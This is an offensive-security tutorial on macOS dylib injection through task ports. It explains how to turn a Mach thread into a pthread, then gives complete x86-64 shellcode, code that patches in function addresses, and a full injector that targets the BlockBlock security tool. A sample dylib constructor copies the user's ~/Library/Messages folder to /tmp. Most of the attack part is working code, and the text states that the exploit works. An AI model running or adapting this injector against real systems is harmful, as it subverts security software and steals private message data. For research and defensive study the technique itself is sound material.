Inject a Dylib
Promote Mach Thread to POSIX Thread
Threads are implemented in the Mach kernel, and each thread belongs to a task. However, because macOS is a POSIX-compliant system, threads can also be manipulated via the POSIX pthread API. Some parts of the system expect to work with pthreads while other parts work with the Mach API, so the thread we create must be usable through both. This duality caused no problems with the execv call we used earlier, so we did not have to deal with it; more complex function calls, however, may crash or fail to work at all.
In short: macOS supports both the Mach API and the Unix API, and this dual support can sometimes lead to complications.
The previous thread injection relied on access to the remote process's task port and ended by calling thread_create_running to start a thread. Mach threads are not created with a corresponding POSIX thread structure, so calls that depend on the pthread API will fail. To make pthread function calls work, we need to promote the Mach thread to a POSIX thread.
Before macOS 10.14 (Mojave), this could be achieved by calling _pthread_set_self with a NULL pointer.
void
_pthread_set_self(pthread_t p)
{
return _pthread_set_self_internal(p, true);
}
static inline void
_pthread_set_self_internal(pthread_t p, bool needs_tsd_base_set)
{
if (p == NULL) {
p = &_thread;
}
uint64_t tid = __thread_selfid();
if (tid == -1ull) {
PTHREAD_ABORT("failed to set thread_id");
}
p->tsd[_PTHREAD_TSD_SLOT_PTHREAD_SELF] = p;
p->tsd[_PTHREAD_TSD_SLOT_ERRNO] = &p->err_no;
p->thread_id = tid;
if (needs_tsd_base_set) {
_thread_set_tsd_base(&p->tsd[0]);
}
}
Since 10.14, the implementation has changed:
void
_pthread_set_self(pthread_t p)
{
#if VARIANT_DYLD
if (os_likely(!p)) {
return _pthread_set_self_dyld();
}
#endif // VARIANT_DYLD
_pthread_set_self_internal(p);
_thread_set_tsd_base(&p->tsd[0]);
}
Two helpers are involved here: _pthread_set_self_dyld and _pthread_set_self_internal. The dyld version is not accessible from user space, while the internal one is.
void
_pthread_set_self_dyld(void)
{
pthread_t p = main_thread();
p->thread_id = __thread_selfid();
if (os_unlikely(p->thread_id == -1ull)) {
PTHREAD_INTERNAL_CRASH(0, "failed to set thread_id");
}
p->tsd[_PTHREAD_TSD_SLOT_PTHREAD_SELF] = p;
p->tsd[_PTHREAD_TSD_SLOT_ERRNO] = &p->err_no;
_thread_set_tsd_base(&p->tsd[0]);
}
static inline void
_pthread_set_self_internal(pthread_t p)
{
os_atomic_store(&p->thread_id, __thread_selfid(), relaxed);
if (os_unlikely(p->thread_id == -1ull)) {
PTHREAD_INTERNAL_CRASH(0, "failed to set thread_id");
}
}
In this version, _pthread_set_self_internal will no longer set up the thread structure since it expects to find a valid thread structure already present. If we pass NULL in place of the thread structure pointer, the function will crash due to a NULL pointer dereference.
Therefore, we turn to another option: pthread_create_from_mach_thread.
/*
* A version of pthread_create that is safely callable from an injected mach thread.
*
* The _create introspection hook will not fire for threads created from this function.
*
* It is not safe to call this function concurrently.
*/
__API_AVAILABLE(macos(10.12), ios(10.0), tvos(10.0), watchos(3.0))
(...)
int pthread_create_from_mach_thread(pthread_t * __restrict,
const pthread_attr_t * _Nullable __restrict,
void *(* _Nonnull)(void *), void * _Nullable __restrict);
This function allows a pthread to be created from a mach thread.
int
pthread_create_from_mach_thread(pthread_t *thread, const pthread_attr_t *attr,
void *(*start_routine)(void *), void *arg)
{
unsigned int flags = _PTHREAD_CREATE_FROM_MACH_THREAD;
return _pthread_create(thread, attr, start_routine, arg, flags);
}
Unlike the original solution, this function does not promote our thread into a valid pthread; it creates a new, valid pthread instead. Our plan is therefore to use the injected Mach thread to create a new, fully configured pthread. We have to pass in an address that will hold the pthread_t handle and the location of the start routine. The other arguments can be NULL, i.e. pthread_create_from_mach_thread(address for the pthread_t handle, 0, location of the start routine, 0).
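The four-argument call shape described here can be tried out safely with the standard pthread_create, which takes the same arguments in the same order. The sketch below swaps in pthread_create for pthread_create_from_mach_thread so that it runs from an ordinary thread; the names start_routine_ran and spawn_with_null_attr_and_arg are made up for illustration.

```c
#include <pthread.h>
#include <stddef.h>

/* Flag written by the new thread so the caller can see that it ran. */
static int start_routine_ran = 0;

/* Start routine with the void *(*)(void *) signature both APIs expect. */
static void *start_routine(void *arg) {
    (void)arg;                 /* the argument is NULL in this sketch */
    start_routine_ran = 1;
    return NULL;
}

/* Creates a thread with NULL attributes and a NULL argument, then waits
 * for it to finish. Returns 0 on success or a pthread error code. */
int spawn_with_null_attr_and_arg(void) {
    pthread_t thread;          /* storage for the new thread's handle (argument 1) */
    int rc = pthread_create(&thread, NULL, start_routine, NULL);
    if (rc != 0) {
        return rc;
    }
    return pthread_join(thread, NULL);
}
```

Only the first and third arguments carry information here, which is why the shellcode later zeroes rsi and rcx.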
Shellcode
The shellcode should have 2 essential components:
- Create a new thread from our Mach thread, calling pthread_create_from_mach_thread.
- The new thread calls dlopen to load the dylib of our choice.
Complete shellcode:
;bootstrap Mach thread
_shellcode:
0: 55 push rbp ; function prologue
1: 48 89 e5 mov rbp,rsp
4: 48 83 ec 10 sub rsp,0x10
8: 48 8d 7d f8 lea rdi,[rbp-8] ; arg0=rdi=address of (rbp-8)
c: 48 31 f6 xor rsi,rsi ; arg1=rsi=0
f: 48 31 c9 xor rcx,rcx ; arg3=rcx=0
12: 48 8d 15 0e 00 00 00 lea rdx,[rip+0xe] ; arg2=rdx= address of (_thread)
19: 48 b8 50 54 48 52 44 movabs rax,0x5452434452485450 ; move address of pthread_create_from_mach_thread into rax
20: 43 52 54
23: ff d0 call rax ; call pthread_create_from_mach_thread
_jump:
25: eb fe jmp 25 <_jump> ; infinite loop
;the new thread to start dlopen
_thread:
27: 55 push rbp ; function prologue
28: 48 89 e5 mov rbp,rsp
2b: 48 83 ec 10 sub rsp,0x10
2f: 6a 01 push 0x1
31: 5e pop rsi ; arg1 = rsi = RTLD_LAZY
32: 48 8d 3d 12 00 00 00 lea rdi,[rip+0x12] ; arg0 = rdi = address of (_thread+0x24)
39: 48 b8 44 4c 4f 50 45 movabs rax,0x5f5f4e45504f4c44
40: 4e 5f 5f
43: ff d0 call rax ; call dlopen
45: 48 83 c4 10 add rsp,0x10 ; function epilogue
49: 5d pop rbp
4a: c3 ret
4b: LIBLIBLIBLIB... ; placeholder for our DYLIB string
In the _shellcode section, we set rdi, the first argument, to an address (rbp-8) where the new pthread_t handle will be stored. We set rdx, the third argument, to point to the start routine of the new thread (offset 0x27) via RIP-relative addressing.
The movabs at offset 0x19 loads a placeholder value into rax, which we will patch later. The infinite loop that follows the call prevents the Mach thread from exiting.
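The RIP-relative displacements in the listing can be checked by hand: the target is the offset of the next instruction plus the displacement. A minimal sketch of that arithmetic follows; the helper name rip_relative_target is hypothetical.

```c
#include <stdint.h>

/* Computes the offset a RIP-relative operand refers to.
 * insn_offset:  offset of the instruction within the shellcode
 * insn_length:  encoded length of that instruction in bytes
 * displacement: signed 32-bit displacement stored in the instruction */
uint64_t rip_relative_target(uint64_t insn_offset, uint64_t insn_length,
                             int32_t displacement) {
    /* RIP already points at the next instruction when the operand is resolved. */
    uint64_t next_insn = insn_offset + insn_length;
    return next_insn + (uint64_t)(int64_t)displacement;
}
```

For the 7-byte lea at offset 0x12 with displacement 0xe this gives 0x27 (the _thread label), and for the 7-byte lea at offset 0x32 with displacement 0x12 it gives 0x4b (the library path placeholder).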
To call dlopen(), we need to pass two arguments.
void* dlopen(const char* path, int mode);
The preferred mode is 0x1.
#define RTLD_LAZY 0x1
rip+0x12 points to offset 0x4b, where the placeholder string is located.
We can use the dlsym function, declared in dlfcn.h, to look up the addresses of functions.
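As a rough illustration of a dlsym lookup, the sketch below resolves a symbol by name in the current process. It obtains a handle with dlopen(NULL, RTLD_LAZY) instead of using RTLD_DEFAULT, purely as a portability assumption; the helper name resolve_symbol is hypothetical.

```c
#include <dlfcn.h>
#include <stddef.h>
#include <stdint.h>

/* Looks up a symbol among the images already loaded in this process.
 * Returns its address as a 64-bit integer, or 0 if it cannot be found. */
uint64_t resolve_symbol(const char *name) {
    /* A NULL path yields a handle for the main program and its dependencies. */
    void *self = dlopen(NULL, RTLD_LAZY);
    if (self == NULL) {
        return 0;
    }
    void *addr = dlsym(self, name);
    dlclose(self);             /* drops our reference; the images stay loaded */
    return (uint64_t)(uintptr_t)addr;
}
```

A call such as resolve_symbol("malloc") should return a non-zero address, while an unknown name returns 0, so the result is worth checking before it is used.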
The initial shellcode:
char shellcode[] =
"\x55" // push rbp
"\x48\x89\xE5" // mov rbp, rsp
"\x48\x83\xEC\x10" // sub rsp, 0x10
"\x48\x8D\x7D\xF8" // lea rdi, qword [rbp-8]
"\x48\x31\xc9" // xor rcx,rcx
"\x48\x31\xf6" // xor rsi,rsi
"\x48\x8D\x15\x0E\x00\x00\x00" // lea rdx, qword ptr [rip + 0xe]
"\x48\xB8" // movabs rax, pthread_create_from_mach_thread
"PTHRDCRT"
"\xFF\xD0" // call rax
"\xEB\xFE" // jmp -2
"\x55" // push rbp
"\x48\x89\xE5" // mov rbp, rsp
"\x48\x83\xEC\x10" // sub rsp, 0x10
"\x6A\x01" // push 1
"\x5E" // pop rsi
"\x48\x8D\x3D\x12\x00\x00\x00" // lea rdi, qword ptr [rip + 0x12]
"\x48\xB8" // movabs rax, dlopen
"DLOPEN__"
"\xFF\xD0" // call rax
"\x48\x83\xC4\x10" // add rsp, 0x10
"\x5D" // pop rbp
"\xC3" // ret
"LIBLIBLIBLIB"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
However, we need to patch placeholder values before the injection.
Apart from using dlsym, we can also get a function's address by referring to the function directly, which only requires including the header that declares it (e.g. pthread.h or dlfcn.h).
char* lib = "/tmp/bb.dylib";
uint64_t addr_of_pthread_create = (uint64_t)dlsym(RTLD_DEFAULT, "pthread_create_from_mach_thread");
uint64_t addr_of_dlopen = (uint64_t)dlopen;
char *possible_patch_location = (shellcode);
// scan only while the longest (9-byte) comparison still fits inside the buffer
for (size_t i = 0; i + 9 <= sizeof(shellcode); i++, possible_patch_location++) {
// replace the 8-byte marker with the address of pthread_create_from_mach_thread
if (memcmp(possible_patch_location, "PTHRDCRT", 8) == 0) {
printf("pthread_create_from_mach_thread @%llx\n", addr_of_pthread_create);
memcpy(possible_patch_location, &addr_of_pthread_create, 8);
}
// replace the 8-byte marker with the address of dlopen
if (memcmp(possible_patch_location, "DLOPEN__", 8) == 0) {
printf("dlopen @%llx\n", addr_of_dlopen);
memcpy(possible_patch_location, &addr_of_dlopen, sizeof(uint64_t));
}
// overwrite the path placeholder with the dylib path
if (memcmp(possible_patch_location, "LIBLIBLIB", 9) == 0) {
strcpy(possible_patch_location, lib);
}
}
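The address of pthread_create_from_mach_thread was obtained via dlsym, while the address of dlopen was obtained by casting the function pointer directly. Both addresses are resolved in the injector's own process; this works because system libraries are normally mapped at the same address in every process.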
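The marker-patching idea can also be written as a small bounds-checked helper. This is only a sketch: find_marker and patch_u64 are hypothetical names, and the value is written in host byte order, which matches what movabs expects on little-endian x86-64.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Returns the offset of the first occurrence of marker in buf, or -1. */
long find_marker(const uint8_t *buf, size_t buf_len, const char *marker) {
    size_t marker_len = strlen(marker);
    if (marker_len == 0 || marker_len > buf_len) {
        return -1;
    }
    /* Stop early enough that every comparison stays inside the buffer. */
    for (size_t i = 0; i + marker_len <= buf_len; i++) {
        if (memcmp(buf + i, marker, marker_len) == 0) {
            return (long)i;
        }
    }
    return -1;
}

/* Overwrites an 8-byte marker with a 64-bit value.
 * Returns 0 on success, -1 if the marker has the wrong size or is missing. */
int patch_u64(uint8_t *buf, size_t buf_len, const char *marker, uint64_t value) {
    if (strlen(marker) != sizeof(value)) {
        return -1;
    }
    long offset = find_marker(buf, buf_len, marker);
    if (offset < 0) {
        return -1;
    }
    memcpy(buf + offset, &value, sizeof(value));
    return 0;
}
```

Returning an error when a marker is missing makes it easier to notice a placeholder that was never patched.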
Create a PoC dylib:
#include <stdlib.h>
__attribute__((constructor))
static void customConstructor(int argc, const char **argv) {
system("cp -r ~/Library/Messages/ /tmp/Messages/");
exit(0);
}
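The mechanism the dylib relies on is the constructor attribute: a function marked this way runs automatically when its image is loaded, before any other code in it is called. A harmless sketch that only records that it ran is shown below; the names on_load and constructor_has_run are hypothetical.

```c
/* Set to 1 by the constructor; starts at 0 through static initialization. */
static int constructor_ran = 0;

/* Runs automatically when the image containing it is loaded:
 * at dlopen time for a dylib, or before main for an executable. */
__attribute__((constructor))
static void on_load(void) {
    constructor_ran = 1;
}

/* Reports whether the constructor has already executed. */
int constructor_has_run(void) {
    return constructor_ran;
}
```

Because the constructor fires on load, the injected thread only has to call dlopen; no further call into the dylib is needed.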
Complete code:
#import <Foundation/Foundation.h>
#import <AppKit/AppKit.h>
#include <mach/mach_vm.h>
#include <sys/sysctl.h>
#include <dlfcn.h>
#include <pthread.h>
#define STACK_SIZE 0x1000
#define CODE_SIZE 128
char shellcode[] =
"\x55" // push rbp
"\x48\x89\xE5" // mov rbp, rsp
"\x48\x83\xEC\x10" // sub rsp, 0x10
"\x48\x8D\x7D\xF8" // lea rdi, qword [rbp-8]
"\x48\x31\xc9" // xor rcx,rcx
"\x48\x31\xf6" // xor rsi,rsi
"\x48\x8D\x15\x0E\x00\x00\x00" // lea rdx, qword ptr [rip + 0xe]
"\x48\xB8" // movabs rax, pthread_create_from_mach_thread
"PTHRDCRT"
"\xFF\xD0" // call rax
"\xEB\xFE" // jmp -2
"\x55" // push rbp
"\x48\x89\xE5" // mov rbp, rsp
"\x48\x83\xEC\x10" // sub rsp, 0x10
"\x6A\x01" // push 1
"\x5E" // pop rsi
"\x48\x8D\x3D\x12\x00\x00\x00" // lea rdi, qword ptr [rip + 0x12]
"\x48\xB8" // movabs rax, dlopen
"DLOPEN__"
"\xFF\xD0" // call rax
"\x48\x83\xC4\x10" // add rsp, 0x10
"\x5D" // pop rbp
"\xC3" // ret
"LIBLIBLIBLIB"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
uid_t get_uid(pid_t pid)
{
uid_t uid = 0;
struct kinfo_proc process;
size_t buffer_size = sizeof(process);
// Compose search path for sysctl. Here you can specify PID directly.
const u_int mib_len = 4;
int mib[mib_len] = {CTL_KERN, KERN_PROC, KERN_PROC_PID, pid};
int sysctl_result = sysctl(mib, mib_len, &process, &buffer_size, NULL, 0);
// If sysctl did not fail and process with PID available - take UID.
if ((sysctl_result == 0) && (buffer_size != 0)) {
uid = process.kp_eproc.e_ucred.cr_uid;
}
return uid;
}
pid_t get_pid(NSString* bundle_id) {
pid_t pid = 0;
uid_t uid = -1;
//find applications with bundle ID
NSArray *runningApplications = [NSRunningApplication runningApplicationsWithBundleIdentifier:bundle_id];
//check if any found at all
if (runningApplications.count > 0) {
for (id app in runningApplications) {
pid = [app processIdentifier];
uid = get_uid(pid);
if (uid != 0) {
//if not root (=0) return
return pid;
}
}
}
//if we got here, it means that we didn't find an instance
printf("[-] There is no instance of the application running as user, exiting...\n");
exit(-1);
}
int main(int argc, const char * argv[]) {
pid_t pid = get_pid(@"com.objectiveSee.BlockBlock");
task_t remoteTask;
kern_return_t kr = task_for_pid(mach_task_self(), pid, &remoteTask);
if (kr != KERN_SUCCESS) {
printf("[-] Failed to get task port for pid:%d, error: %s\n", pid, mach_error_string(kr));
return(-1);
}
else {
printf("[+] Got access to the task port of process: %d\n", pid);
}
mach_vm_address_t remoteStack64 = (vm_address_t) NULL;
mach_vm_address_t remoteCode64 = (vm_address_t) NULL;
kr = mach_vm_allocate(remoteTask, &remoteStack64, STACK_SIZE, VM_FLAGS_ANYWHERE);
if (kr != KERN_SUCCESS) {
printf("[-] Failed to allocate stack memory in remote thread, error: %s\n", mach_error_string(kr));
exit(-1);
} else {
printf("[+] Allocated remote stack: 0x%llx\n", remoteStack64);
}
kr = mach_vm_allocate( remoteTask, &remoteCode64, CODE_SIZE, VM_FLAGS_ANYWHERE );
if (kr != KERN_SUCCESS) {
printf("[-] Failed to allocate code memory in remote thread, error: %s\n", mach_error_string(kr));
exit(-1);
} else {
printf("[+] Allocated remote code placeholder: 0x%llx\n", remoteCode64);
}
char* lib = "/tmp/bb.dylib";
uint64_t addr_of_pthread_create = (uint64_t)dlsym(RTLD_DEFAULT, "pthread_create_from_mach_thread");
uint64_t addr_of_dlopen = (uint64_t)dlopen;
char *possible_patch_location = (shellcode);
// scan only while the longest (9-byte) comparison still fits inside the buffer
for (size_t i = 0; i + 9 <= sizeof(shellcode); i++, possible_patch_location++) {
// replace the 8-byte marker with the address of pthread_create_from_mach_thread
if (memcmp(possible_patch_location, "PTHRDCRT", 8) == 0) {
printf("pthread_create_from_mach_thread @%llx\n", addr_of_pthread_create);
memcpy(possible_patch_location, &addr_of_pthread_create, 8);
}
// replace the 8-byte marker with the address of dlopen
if (memcmp(possible_patch_location, "DLOPEN__", 8) == 0) {
printf("dlopen @%llx\n", addr_of_dlopen);
memcpy(possible_patch_location, &addr_of_dlopen, sizeof(uint64_t));
}
// overwrite the path placeholder with the dylib path
if (memcmp(possible_patch_location, "LIBLIBLIB", 9) == 0) {
strcpy(possible_patch_location, lib);
}
}
kr = mach_vm_write(remoteTask, remoteCode64, (vm_address_t) shellcode, CODE_SIZE);
if (kr != KERN_SUCCESS) {
printf("[-] Failed to write into remote thread memory, error: %s\n", mach_error_string(kr));
exit(-1);
}
kr = vm_protect(remoteTask, remoteCode64, CODE_SIZE, FALSE, VM_PROT_READ | VM_PROT_EXECUTE);
if (kr != KERN_SUCCESS) {
printf("[!] Failed to give injected code memory proper permissions, error: %s\n", mach_error_string(kr));
exit(-1);
}
kr = vm_protect(remoteTask, remoteStack64, STACK_SIZE, TRUE, VM_PROT_READ | VM_PROT_WRITE);
if (kr != KERN_SUCCESS) {
printf("[!] Failed to give stack memory proper permissions, error: %s\n", mach_error_string(kr));
exit(-1);
}
x86_thread_state64_t remoteThreadState64;
memset(&remoteThreadState64, '\0', sizeof(remoteThreadState64) );
//shift stack
remoteStack64 += (STACK_SIZE / 2); // this is the real stack
// set remote instruction pointer
remoteThreadState64.__rip = (u_int64_t) remoteCode64;
// set remote Stack Pointer
remoteThreadState64.__rsp = (u_int64_t) remoteStack64;
remoteThreadState64.__rbp = (u_int64_t) remoteStack64;
printf ("[+] Remote Stack 64 0x%llx, Remote code is 0x%llx\n", remoteStack64, remoteCode64 );
//thread variable
thread_act_t remoteThread;
//create thread
kr = thread_create_running( remoteTask, x86_THREAD_STATE64,
(thread_state_t) &remoteThreadState64, x86_THREAD_STATE64_COUNT, &remoteThread);
if (kr != KERN_SUCCESS) {
printf("[-] Exploit failed: error: %s\n", mach_error_string (kr));
return (-1);
}
printf("[+] Exploit succeeded! Check /tmp/\n");
return (0);
}
Compile them:
The exploit works.